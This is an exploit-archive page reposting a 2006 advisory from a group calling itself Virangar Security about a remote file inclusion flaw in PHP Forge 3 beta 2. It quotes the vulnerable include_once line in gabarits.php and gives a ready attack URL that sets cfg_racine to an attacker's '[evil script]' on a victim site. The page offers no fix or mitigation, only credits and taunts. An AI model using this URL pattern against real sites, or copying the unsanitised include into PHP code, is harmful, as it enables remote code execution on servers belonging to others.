PHP Forge <= 3 beta 2 (cfg_racine) Remote File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : PHP Forge <= 3 beta 2 (cfg_racine) Remote File Inclusion Vulnerability
# Published : 2006-07-22
# Author : Virangar Security
# Previous Title : multibanners Mambo Component <= 1.0.1 Remote Inclusion Vulnerability
# Next Title : LoudBlog <= 0.5 (id) SQL Injection / Admin Credentials Disclosure

\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
phpforge3b2(cfg_racine) Remote File Inclusion Vulnerability
------------------------
Virangar Security Team
www.virangar.org >public
www.virangar.net >priv8
--------
Discoverd By : Snake & hadihadi_zedehal
contact  :  Snake.Apollyon@YaHo0.com  ** hadihadi_zedehal_2006@YaHo0.com
special tnx 2: A.Nosrati * l0pht.Blackhot * Kouros.virus & all virangar members
greetz:hadi_aryaie2004 * ahmad_virangar2004  * mahtab_e66
---------
bug found in file :gabarits.php
Remote : Yes
Critical Level : Dangerous
web:http://phpforge.oirac.com/
---------
vlu codes:
include_once($cfg_racine."inc/systeme.php");
---------

http://www.victim.com/[patch]/inc/gabarits.php?cfg_racine=[evil script]

--------
See you in Hell!!.....
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

# www.Syue.com [2006-07-22]